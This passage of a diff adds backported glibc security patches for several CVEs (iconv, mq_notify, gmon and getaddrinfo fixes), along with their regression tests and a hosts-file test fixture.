33@@ -44,7 +44,7 @@ CFLAGS-linereader.c += -DNO_TRANSLITERATION
34 CFLAGS-simple-hash.c += -I../locale
35
36 tests = tst-iconv1 tst-iconv2 tst-iconv3 tst-iconv4 tst-iconv5 tst-iconv6 \
37- tst-iconv7 tst-iconv-mt tst-iconv-opt
38+ tst-iconv7 tst-iconv8 tst-iconv-mt tst-iconv-opt
39
40 others = iconv_prog iconvconfig
41 install-others-programs = $(inst_bindir)/iconv
42diff --git a/iconv/gconv_simple.c b/iconv/gconv_simple.c
43index d4797fba17..963b29f246 100644
44--- a/iconv/gconv_simple.c
45+++ b/iconv/gconv_simple.c
46@@ -239,11 +239,9 @@ ucs4_internal_loop (struct __gconv_step *step,
47 int flags = step_data->__flags;
48 const unsigned char *inptr = *inptrp;
49 unsigned char *outptr = *outptrp;
50- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
51 int result;
52- size_t cnt;
53
54- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
55+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
56 {
57 uint32_t inval;
58
59@@ -307,11 +305,9 @@ ucs4_internal_loop_unaligned (struct __gconv_step *step,
60 int flags = step_data->__flags;
61 const unsigned char *inptr = *inptrp;
62 unsigned char *outptr = *outptrp;
63- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
64 int result;
65- size_t cnt;
66
67- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
68+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
69 {
70 if (__glibc_unlikely (inptr[0] > 0x80))
71 {
72@@ -613,11 +609,9 @@ ucs4le_internal_loop (struct __gconv_step *step,
73 int flags = step_data->__flags;
74 const unsigned char *inptr = *inptrp;
75 unsigned char *outptr = *outptrp;
76- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
77 int result;
78- size_t cnt;
79
80- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
81+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
82 {
83 uint32_t inval;
84
85@@ -684,11 +678,9 @@ ucs4le_internal_loop_unaligned (struct __gconv_step *step,
86 int flags = step_data->__flags;
87 const unsigned char *inptr = *inptrp;
88 unsigned char *outptr = *outptrp;
89- size_t n_convert = MIN (inend - inptr, outend - outptr) / 4;
90 int result;
91- size_t cnt;
92
93- for (cnt = 0; cnt < n_convert; ++cnt, inptr += 4)
94+ for (; inptr + 4 <= inend && outptr + 4 <= outend; inptr += 4)
95 {
96 if (__glibc_unlikely (inptr[3] > 0x80))
97 {
98diff --git a/iconv/tst-iconv8.c b/iconv/tst-iconv8.c
99new file mode 100644
100index 0000000000..0b92b19f66
101--- /dev/null
102+++ b/iconv/tst-iconv8.c
103@@ -0,0 +1,50 @@
104+/* Test iconv behavior on UCS4 conversions with //IGNORE.
105+ Copyright (C) 2020 Free Software Foundation, Inc.
106+ This file is part of the GNU C Library.
107+
108+ The GNU C Library is free software; you can redistribute it and/or
109+ modify it under the terms of the GNU Lesser General Public
110+ License as published by the Free Software Foundation; either
111+ version 2.1 of the License, or (at your option) any later version.
112+
113+ The GNU C Library is distributed in the hope that it will be useful,
114+ but WITHOUT ANY WARRANTY; without even the implied warranty of
115+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
116+ Lesser General Public License for more details.
117+
118+ You should have received a copy of the GNU Lesser General Public
119+ License along with the GNU C Library; if not, see
120+ <http://www.gnu.org/licenses/>. */
121+
122+/* Derived from BZ #26923 */
123+#include <errno.h>
124+#include <iconv.h>
125+#include <stdio.h>
126+#include <support/check.h>
127+
128+static int
129+do_test (void)
130+{
131+ iconv_t cd = iconv_open ("UTF-8//IGNORE", "ISO-10646/UCS4/");
132+ TEST_VERIFY_EXIT (cd != (iconv_t) -1);
133+
134+ /*
135+ * Convert sequence beginning with an irreversible character into buffer that
136+ * is too small.
137+ */
138+ char input[12] = "\xe1\x80\xa1" "AAAAAAAAA";
139+ char *inptr = input;
140+ size_t insize = sizeof (input);
141+ char output[6];
142+ char *outptr = output;
143+ size_t outsize = sizeof (output);
144+
145+ TEST_VERIFY (iconv (cd, &inptr, &insize, &outptr, &outsize) == -1);
146+ TEST_VERIFY (errno == E2BIG);
147+
148+ TEST_VERIFY_EXIT (iconv_close (cd) != -1);
149+
150+ return 0;
151+}
152+
153+#include <support/test-driver.c>
154--
1552.27.0
156
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
new file mode 100644
index 0000000000..7561e87121
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
1From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
2From: Andreas Schwab <schwab@linux-m68k.org>
3Date: Thu, 27 May 2021 12:49:47 +0200
4Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
5
6Make a deep copy of the pthread attribute object to remove a potential
7use-after-free issue.
8
9Upstream-Status: Backport
10CVE: CVE-2021-33574 patch#1
11Signed-off-by: Armin Kuster <akuster@mvista.com>
12
13---
14diff --git a/NEWS b/NEWS
15index 8a20d3c4e3..be489243ac 100644
16--- a/NEWS
17+++ b/NEWS
18@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
19
20 Version 2.31.1
21
22+ CVE-2021-33574: The mq_notify function has a potential use-after-free
23+ issue when using a notification type of SIGEV_THREAD and a thread
24+ attribute with a non-default affinity mask.
25+
26 The following bugs are resolved with this release:
27 [14231] stdio-common tests memory requirements
28 [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
29diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
30index f288bac477..dd47f0b777 100644
31--- a/sysdeps/unix/sysv/linux/mq_notify.c
32+++ b/sysdeps/unix/sysv/linux/mq_notify.c
33@@ -135,8 +135,11 @@ helper_thread (void *arg)
34 (void) __pthread_barrier_wait (&notify_barrier);
35 }
36 else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
37- /* The only state we keep is the copy of the thread attributes. */
38- free (data.attr);
39+ {
40+ /* The only state we keep is the copy of the thread attributes. */
41+ pthread_attr_destroy (data.attr);
42+ free (data.attr);
43+ }
44 }
45 return NULL;
46 }
47@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
48 if (data.attr == NULL)
49 return -1;
50
51- memcpy (data.attr, notification->sigev_notify_attributes,
52- sizeof (pthread_attr_t));
53+ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
54 }
55
56 /* Construct the new request. */
57@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
58
59 /* If it failed, free the allocated memory. */
60 if (__glibc_unlikely (retval != 0))
61- free (data.attr);
62+ {
63+ pthread_attr_destroy (data.attr);
64+ free (data.attr);
65+ }
66
67 return retval;
68 }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
new file mode 100644
index 0000000000..396cd7fc0e
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
1From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
2From: Florian Weimer <fweimer@redhat.com>
3Date: Tue, 1 Jun 2021 17:51:41 +0200
4Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
5
6__pthread_attr_copy can fail and does not initialize the attribute
7structure in that case.
8
9If __pthread_attr_copy is never called and there is no allocated
10attribute, pthread_attr_destroy should not be called, otherwise
11there is a null pointer dereference in rt/tst-mqueue6.
12
13Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
14("Use __pthread_attr_copy in mq_notify (bug 27896)").
15
16Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
17
18https://sourceware.org/bugzilla/attachment.cgi?id=13497
19
20Upstream-Status: Backport
21CVE: CVE-2021-33574 patch#2
22Signed-off-by: Armin Kuster &lt;akuster@mvista.com&gt;
23
24---
25Index: git/sysdeps/unix/sysv/linux/mq_notify.c
26===================================================================
27--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
28+++ git/sysdeps/unix/sysv/linux/mq_notify.c
29@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
30 if (data.attr == NULL)
31 return -1;
32
33- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
34+ memcpy (data.attr, notification->sigev_notify_attributes,
35+ sizeof (pthread_attr_t));
36+
37+ struct pthread_attr *source =
38+ (struct pthread_attr *) (notification->sigev_notify_attributes);
39+ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
40+ cpu_set_t *newp;
41+ cpu_set_t *cpuset = source->cpuset;
42+ size_t cpusetsize = source->cpusetsize;
43+
44+ /* alloc a new memory for cpuset to avoid use after free */
45+ if (cpuset != NULL && cpusetsize > 0)
46+ {
47+ newp = (cpu_set_t *) malloc (cpusetsize);
48+ if (newp == NULL)
49+ {
50+ free(data.attr);
51+ return -1;
52+ }
53+
54+ memcpy (newp, cpuset, cpusetsize);
55+ target->cpuset = newp;
56+ }
57+ else
58+ {
59+ target->cpuset = NULL;
60+ target->cpusetsize = 0;
61+ }
62 }
63
64 /* Construct the new request. */
65@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
66 int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
67
68 /* If it failed, free the allocated memory. */
69- if (__glibc_unlikely (retval != 0))
70+ if (retval != 0 && data.attr != NULL)
71 {
72 pthread_attr_destroy (data.attr);
73 free (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
1From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
2From: Nikita Popov <npv1310@gmail.com>
3Date: Mon, 9 Aug 2021 20:17:34 +0530
4Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
5
6Helper thread frees copied attribute on NOTIFY_REMOVED message
7received from the OS kernel. Unfortunately, it fails to check whether
8copied attribute actually exists (data.attr != NULL). This worked
9earlier because free() checks passed pointer before actually
10attempting to release corresponding memory. But
11__pthread_attr_destroy assumes pointer is not NULL.
12
13So passing NULL pointer to __pthread_attr_destroy will result in
14segmentation fault. This scenario is possible if
15notification->sigev_notify_attributes == NULL (which means default
16thread attributes should be used).
17
18Signed-off-by: Nikita Popov <npv1310@gmail.com>
19Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
20
21Upstream-Status: Backport
22CVE: CVE-2021-38604
23Signed-off-by: Armin Kuser <akuster@mvista.com>
24
25---
26 sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
27 1 file changed, 1 insertion(+), 1 deletion(-)
28
29Index: git/sysdeps/unix/sysv/linux/mq_notify.c
30===================================================================
31--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
32+++ git/sysdeps/unix/sysv/linux/mq_notify.c
33@@ -134,7 +134,7 @@ helper_thread (void *arg)
34 to wait until it is done with it. */
35 (void) __pthread_barrier_wait (&notify_barrier);
36 }
37- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
38+ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
39 {
40 /* The only state we keep is the copy of the thread attributes. */
41 pthread_attr_destroy (data.attr);
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
new file mode 100644
index 0000000000..10c7e5666d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
1From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
3 =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
4Date: Sat, 4 Feb 2023 14:41:38 +0300
5Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10The `__monstartup()` allocates a buffer used to store all the data
11accumulated by the monitor.
12
13The size of this buffer depends on the size of the internal structures
14used and the address range for which the monitor is activated, as well
15as on the maximum density of call instructions and/or callable functions
16that could be potentially on a segment of executable code.
17
18In particular a hash table of arcs is placed at the end of this buffer.
19The size of this hash table is calculated in bytes as
20 p->fromssize = p->textsize / HASHFRACTION;
21
22but actually should be
23 p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
24
25This results in writing beyond the end of the allocated buffer when an
26added arc corresponds to a call near from the end of the monitored
27address range, since `_mcount()` check the incoming caller address for
28monitored range but not the intermediate result hash-like index that
29uses to write into the table.
30
31It should be noted that when the results are output to `gmon.out`, the
32table is read to the last element calculated from the allocated size in
33bytes, so the arcs stored outside the buffer boundary did not fall into
34`gprof` for analysis. Thus this "feature" help me to found this bug
35during working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
36
37Just in case, I will explicitly note that the problem breaks the
38`make test t=gmon/tst-gmon-dso` added for Bug 29438.
39There, the arc of the `f3()` call disappears from the output, since in
40the DSO case, the call to `f3` is located close to the end of the
41monitored range.
42
43Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
44
45Another minor error seems a related typo in the calculation of
46`kcountsize`, but since kcounts are smaller than froms, this is
47actually to align the p->froms data.
48
49Co-authored-by: DJ Delorie <dj@redhat.com>
50Reviewed-by: Carlos O'Donell <carlos@redhat.com>
51
52Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
53CVE: CVE-2023-0687
54Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
55---
56 gmon/gmon.c | 4 +++-
57 1 file changed, 3 insertions(+), 1 deletion(-)
58
59diff --git a/gmon/gmon.c b/gmon/gmon.c
60index dee6480..bf76358 100644
61--- a/gmon/gmon.c
62+++ b/gmon/gmon.c
63@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
64 p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
65 p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
66 p->textsize = p->highpc - p->lowpc;
67+ /* This looks like a typo, but it's here to align the p->froms
68+ section. */
69 p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
70 p->hashfraction = HASHFRACTION;
71 p->log_hashfraction = -1;
72@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
73 instead of integer division. Precompute shift amount. */
74 p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
75 }
76- p->fromssize = p->textsize / HASHFRACTION;
77+ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
78 p->tolimit = p->textsize * ARCDENSITY / 100;
79 if (p->tolimit < MINARCS)
80 p->tolimit = MINARCS;
81--
822.7.4
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
1From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
2From: Siddhesh Poyarekar <siddhesh@sourceware.org>
3Date: Thu, 17 Mar 2022 11:44:34 +0530
4Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
5 #28931]
6
7Allocations for address tuples is currently a bit confusing because of
8the pointer chasing through PAT, making it hard to observe the sequence
9in which allocations have been made. Narrow scope of the pointer
10chasing through PAT so that it is only used where necessary.
11
12This also tightens actions behaviour with the hosts database in
13getaddrinfo to comply with the manual text. The "continue" action
14discards previous results and the "merge" action results in an immedate
15lookup failure. Consequently, chaining of allocations across modules is
16no longer necessary, thus opening up cleanup opportunities.
17
18A test has been added that checks some combinations to ensure that they
19work correctly.
20
21Resolves: BZ #28931
22
23CVE: CVE-2023-4813
24Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
25Comments: Hunks refreshed
26
27Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
28Reviewed-by: DJ Delorie <dj@redhat.com>
29Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
30---
31 nss/Makefile | 1 +
32 nss/tst-nss-gai-actions.c | 149 ++++++
33 nss/tst-nss-gai-actions.root/etc/host.conf | 1 +
34 nss/tst-nss-gai-actions.root/etc/hosts | 508 +++++++++++++++++++++
35 sysdeps/posix/getaddrinfo.c | 143 +++---
36 5 files changed, 750 insertions(+), 52 deletions(-)
37 create mode 100644 nss/tst-nss-gai-actions.c
38 create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
39 create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
40
41diff --git a/nss/Makefile b/nss/Makefile
42index 42a59535cb..d8b06b44fb 100644
43--- a/nss/Makefile
44+++ b/nss/Makefile
45@@ -61,6 +61,7 @@
46
47 tests-container = \
48 tst-nss-test3 \
49+ tst-nss-gai-actions \
50 tst-nss-files-hosts-long \
51 tst-nss-db-endpwent \
52 tst-nss-db-endgrent
53diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
54new file mode 100644
55index 0000000000..efca6cd183
56--- /dev/null
57+++ b/nss/tst-nss-gai-actions.c
58@@ -0,0 +1,149 @@
59+/* Test continue and merge NSS actions for getaddrinfo.
60+ Copyright The GNU Toolchain Authors.
61+ This file is part of the GNU C Library.
62+
63+ The GNU C Library is free software; you can redistribute it and/or
64+ modify it under the terms of the GNU Lesser General Public
65+ License as published by the Free Software Foundation; either
66+ version 2.1 of the License, or (at your option) any later version.
67+
68+ The GNU C Library is distributed in the hope that it will be useful,
69+ but WITHOUT ANY WARRANTY; without even the implied warranty of
70+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
71+ Lesser General Public License for more details.
72+
73+ You should have received a copy of the GNU Lesser General Public
74+ License along with the GNU C Library; if not, see
75+ <https://www.gnu.org/licenses/>. */
76+
77+#include <dlfcn.h>
78+#include <gnu/lib-names.h>
79+#include <nss.h>
80+#include <stdio.h>
81+#include <stdlib.h>
82+#include <string.h>
83+
84+#include <support/check.h>
85+#include <support/format_nss.h>
86+#include <support/support.h>
87+#include <support/xstdio.h>
88+#include <support/xunistd.h>
89+
90+enum
91+{
92+ ACTION_MERGE = 0,
93+ ACTION_CONTINUE,
94+};
95+
96+static const char *
97+family_str (int family)
98+{
99+ switch (family)
100+ {
101+ case AF_UNSPEC:
102+ return "AF_UNSPEC";
103+ case AF_INET:
104+ return "AF_INET";
105+ default:
106+ __builtin_unreachable ();
107+ }
108+}
109+
110+static const char *
111+action_str (int action)
112+{
113+ switch (action)
114+ {
115+ case ACTION_MERGE:
116+ return "merge";
117+ case ACTION_CONTINUE:
118+ return "continue";
119+ default:
120+ __builtin_unreachable ();
121+ }
122+}
123+
124+static void
125+do_one_test (int action, int family, bool canon)
126+{
127+ struct addrinfo hints =
128+ {
129+ .ai_family = family,
130+ };
131+
132+ struct addrinfo *ai;
133+
134+ if (canon)
135+ hints.ai_flags = AI_CANONNAME;
136+
137+ printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
138+ action_str (action), family_str (family),
139+ canon ? "AI_CANONNAME" : "");
140+
141+ int ret = getaddrinfo ("example.org", "80", &hints, &ai);
142+
143+ switch (action)
144+ {
145+ case ACTION_MERGE:
146+ if (ret == 0)
147+ {
148+ char *formatted = support_format_addrinfo (ai, ret);
149+
150+ printf ("merge unexpectedly succeeded:\n %s\n", formatted);
151+ support_record_failure ();
152+ free (formatted);
153+ }
154+ else
155+ return;
156+ case ACTION_CONTINUE:
157+ {
158+ char *formatted = support_format_addrinfo (ai, ret);
159+
160+ /* Verify that the result appears exactly once. */
161+ const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
162+ "address: DGRAM/UDP 192.0.0.1 80\n"
163+ "address: RAW/IP 192.0.0.1 80\n";
164+
165+ const char *contains = strstr (formatted, expected);
166+ const char *contains2 = NULL;
167+
168+ if (contains != NULL)
169+ contains2 = strstr (contains + strlen (expected), expected);
170+
171+ if (contains == NULL || contains2 != NULL)
172+ {
173+ printf ("continue failed:\n%s\n", formatted);
174+ support_record_failure ();
175+ }
176+
177+ free (formatted);
178+ break;
179+ }
180+ default:
181+ __builtin_unreachable ();
182+ }
183+}
184+
185+static void
186+do_one_test_set (int action)
187+{
188+ char buf[32];
189+
190+ snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
191+ action_str (action));
192+ __nss_configure_lookup ("hosts", buf);
193+
194+ do_one_test (action, AF_UNSPEC, false);
195+ do_one_test (action, AF_INET, false);
196+ do_one_test (action, AF_INET, true);
197+}
198+
199+static int
200+do_test (void)
201+{
202+ do_one_test_set (ACTION_CONTINUE);
203+ do_one_test_set (ACTION_MERGE);
204+ return 0;
205+}
206+
207+#include <support/test-driver.c>
208diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
209new file mode 100644
210index 0000000000..d1a59f73a9
211--- /dev/null
212+++ b/nss/tst-nss-gai-actions.root/etc/host.conf
213@@ -0,0 +1 @@
214+multi on
215diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
216new file mode 100644
217index 0000000000..50ce9774dc
218--- /dev/null
219+++ b/nss/tst-nss-gai-actions.root/etc/hosts
220@@ -0,0 +1,508 @@
221+192.0.0.1 example.org
222+192.0.0.2 example.org
223+192.0.0.3 example.org
224+192.0.0.4 example.org
225+192.0.0.5 example.org
226+192.0.0.6 example.org
227+192.0.0.7 example.org
228+192.0.0.8 example.org
229+192.0.0.9 example.org
230+192.0.0.10 example.org
231+192.0.0.11 example.org
232+192.0.0.12 example.org
233+192.0.0.13 example.org
234+192.0.0.14 example.org
235+192.0.0.15 example.org
236+192.0.0.16 example.org
237+192.0.0.17 example.org
238+192.0.0.18 example.org
239+192.0.0.19 example.org
240+192.0.0.20 example.org
241+192.0.0.21 example.org
242+192.0.0.22 example.org
243+192.0.0.23 example.org
244+192.0.0.24 example.org
245+192.0.0.25 example.org
246+192.0.0.26 example.org
247+192.0.0.27 example.org
248+192.0.0.28 example.org
249+192.0.0.29 example.org
250+192.0.0.30 example.org
251+192.0.0.31 example.org
252+192.0.0.32 example.org
253+192.0.0.33 example.org
254+192.0.0.34 example.org
255+192.0.0.35 example.org
256+192.0.0.36 example.org
257+192.0.0.37 example.org
258+192.0.0.38 example.org
259+192.0.0.39 example.org
260+192.0.0.40 example.org
261+192.0.0.41 example.org
262+192.0.0.42 example.org
263+192.0.0.43 example.org
264+192.0.0.44 example.org
265+192.0.0.45 example.org
266+192.0.0.46 example.org
267+192.0.0.47 example.org
268+192.0.0.48 example.org
269+192.0.0.49 example.org
270+192.0.0.50 example.org
271+192.0.0.51 example.org
272+192.0.0.52 example.org
273+192.0.0.53 example.org
274+192.0.0.54 example.org
275+192.0.0.55 example.org
276+192.0.0.56 example.org
277+192.0.0.57 example.org
278+192.0.0.58 example.org
279+192.0.0.59 example.org
280+192.0.0.60 example.org
281+192.0.0.61 example.org
282+192.0.0.62 example.org
283+192.0.0.63 example.org
284+192.0.0.64 example.org
285+192.0.0.65 example.org
286+192.0.0.66 example.org
287+192.0.0.67 example.org
288+192.0.0.68 example.org
289+192.0.0.69 example.org
290+192.0.0.70 example.org
291+192.0.0.71 example.org
292+192.0.0.72 example.org
293+192.0.0.73 example.org
294+192.0.0.74 example.org
295+192.0.0.75 example.org
296+192.0.0.76 example.org
297+192.0.0.77 example.org
298+192.0.0.78 example.org
299+192.0.0.79 example.org
300+192.0.0.80 example.org
301+192.0.0.81 example.org
302+192.0.0.82 example.org
303+192.0.0.83 example.org
304+192.0.0.84 example.org
305+192.0.0.85 example.org
306+192.0.0.86 example.org
307+192.0.0.87 example.org
308+192.0.0.88 example.org
309+192.0.0.89 example.org
310+192.0.0.90 example.org
311+192.0.0.91 example.org
312+192.0.0.92 example.org
313+192.0.0.93 example.org
314+192.0.0.94 example.org
315+192.0.0.95 example.org
316+192.0.0.96 example.org
317+192.0.0.97 example.org
318+192.0.0.98 example.org
319+192.0.0.99 example.org
320+192.0.0.100 example.org
321+192.0.0.101 example.org
322+192.0.0.102 example.org
323+192.0.0.103 example.org
324+192.0.0.104 example.org
325+192.0.0.105 example.org
326+192.0.0.106 example.org
327+192.0.0.107 example.org
328+192.0.0.108 example.org
329+192.0.0.109 example.org
330+192.0.0.110 example.org
331+192.0.0.111 example.org
332+192.0.0.112 example.org
333+192.0.0.113 example.org
334+192.0.0.114 example.org
335+192.0.0.115 example.org
336+192.0.0.116 example.org
337+192.0.0.117 example.org
338+192.0.0.118 example.org
339+192.0.0.119 example.org
340+192.0.0.120 example.org
341+192.0.0.121 example.org
342+192.0.0.122 example.org
343+192.0.0.123 example.org
344+192.0.0.124 example.org
345+192.0.0.125 example.org
346+192.0.0.126 example.org
347+192.0.0.127 example.org
348+192.0.0.128 example.org
349+192.0.0.129 example.org
350+192.0.0.130 example.org
351+192.0.0.131 example.org
352+192.0.0.132 example.org
353+192.0.0.133 example.org
354+192.0.0.134 example.org
355+192.0.0.135 example.org
356+192.0.0.136 example.org
357+192.0.0.137 example.org
358+192.0.0.138 example.org
359+192.0.0.139 example.org
360+192.0.0.140 example.org
361+192.0.0.141 example.org
362+192.0.0.142 example.org
363+192.0.0.143 example.org
364+192.0.0.144 example.org
365+192.0.0.145 example.org
366+192.0.0.146 example.org
367+192.0.0.147 example.org
368+192.0.0.148 example.org
369+192.0.0.149 example.org
370+192.0.0.150 example.org
371+192.0.0.151 example.org
372+192.0.0.152 example.org
373+192.0.0.153 example.org
374+192.0.0.154 example.org
375+192.0.0.155 example.org
376+192.0.0.156 example.org
377+192.0.0.157 example.org
378+192.0.0.158 example.org
379+192.0.0.159 example.org
380+192.0.0.160 example.org
381+192.0.0.161 example.org
382+192.0.0.162 example.org
383+192.0.0.163 example.org
384+192.0.0.164 example.org
385+192.0.0.165 example.org
386+192.0.0.166 example.org
387+192.0.0.167 example.org
388+192.0.0.168 example.org
389+192.0.0.169 example.org
390+192.0.0.170 example.org
391+192.0.0.171 example.org
392+192.0.0.172 example.org
393+192.0.0.173 example.org
394+192.0.0.174 example.org
395+192.0.0.175 example.org
396+192.0.0.176 example.org
397+192.0.0.177 example.org
398+192.0.0.178 example.org
399+192.0.0.179 example.org
400+192.0.0.180 example.org
401+192.0.0.181 example.org
402+192.0.0.182 example.org
403+192.0.0.183 example.org
404+192.0.0.184 example.org
405+192.0.0.185 example.org
406+192.0.0.186 example.org
407+192.0.0.187 example.org
408+192.0.0.188 example.org
409+192.0.0.189 example.org
410+192.0.0.190 example.org
411+192.0.0.191 example.org
412+192.0.0.192 example.org
413+192.0.0.193 example.org
414+192.0.0.194 example.org
415+192.0.0.195 example.org
416+192.0.0.196 example.org
417+192.0.0.197 example.org
418+192.0.0.198 example.org
419+192.0.0.199 example.org
420+192.0.0.200 example.org
421+192.0.0.201 example.org
422+192.0.0.202 example.org
423+192.0.0.203 example.org
424+192.0.0.204 example.org
425+192.0.0.205 example.org
426+192.0.0.206 example.org
427+192.0.0.207 example.org
428+192.0.0.208 example.org
429+192.0.0.209 example.org
430+192.0.0.210 example.org
431+192.0.0.211 example.org
432+192.0.0.212 example.org
433+192.0.0.213 example.org
434+192.0.0.214 example.org
435+192.0.0.215 example.org
436+192.0.0.216 example.org
437+192.0.0.217 example.org
438+192.0.0.218 example.org
439+192.0.0.219 example.org
440+192.0.0.220 example.org
441+192.0.0.221 example.org
442+192.0.0.222 example.org
443+192.0.0.223 example.org
444+192.0.0.224 example.org
445+192.0.0.225 example.org
446+192.0.0.226 example.org
447+192.0.0.227 example.org
448+192.0.0.228 example.org
449+192.0.0.229 example.org
450+192.0.0.230 example.org
451+192.0.0.231 example.org
452+192.0.0.232 example.org
453+192.0.0.233 example.org
454+192.0.0.234 example.org
455+192.0.0.235 example.org
456+192.0.0.236 example.org
457+192.0.0.237 example.org
458+192.0.0.238 example.org
459+192.0.0.239 example.org
460+192.0.0.240 example.org
461+192.0.0.241 example.org
462+192.0.0.242 example.org
463+192.0.0.243 example.org
464+192.0.0.244 example.org
465+192.0.0.245 example.org
466+192.0.0.246 example.org
467+192.0.0.247 example.org
468+192.0.0.248 example.org
469+192.0.0.249 example.org
470+192.0.0.250 example.org
471+192.0.0.251 example.org
472+192.0.0.252 example.org
473+192.0.0.253 example.org
474+192.0.0.254 example.org
475+192.0.1.1 example.org
476+192.0.1.2 example.org
477+192.0.1.3 example.org
478+192.0.1.4 example.org
479+192.0.1.5 example.org
480+192.0.1.6 example.org
481+192.0.1.7 example.org
482+192.0.1.8 example.org
483+192.0.1.9 example.org
484+192.0.1.10 example.org
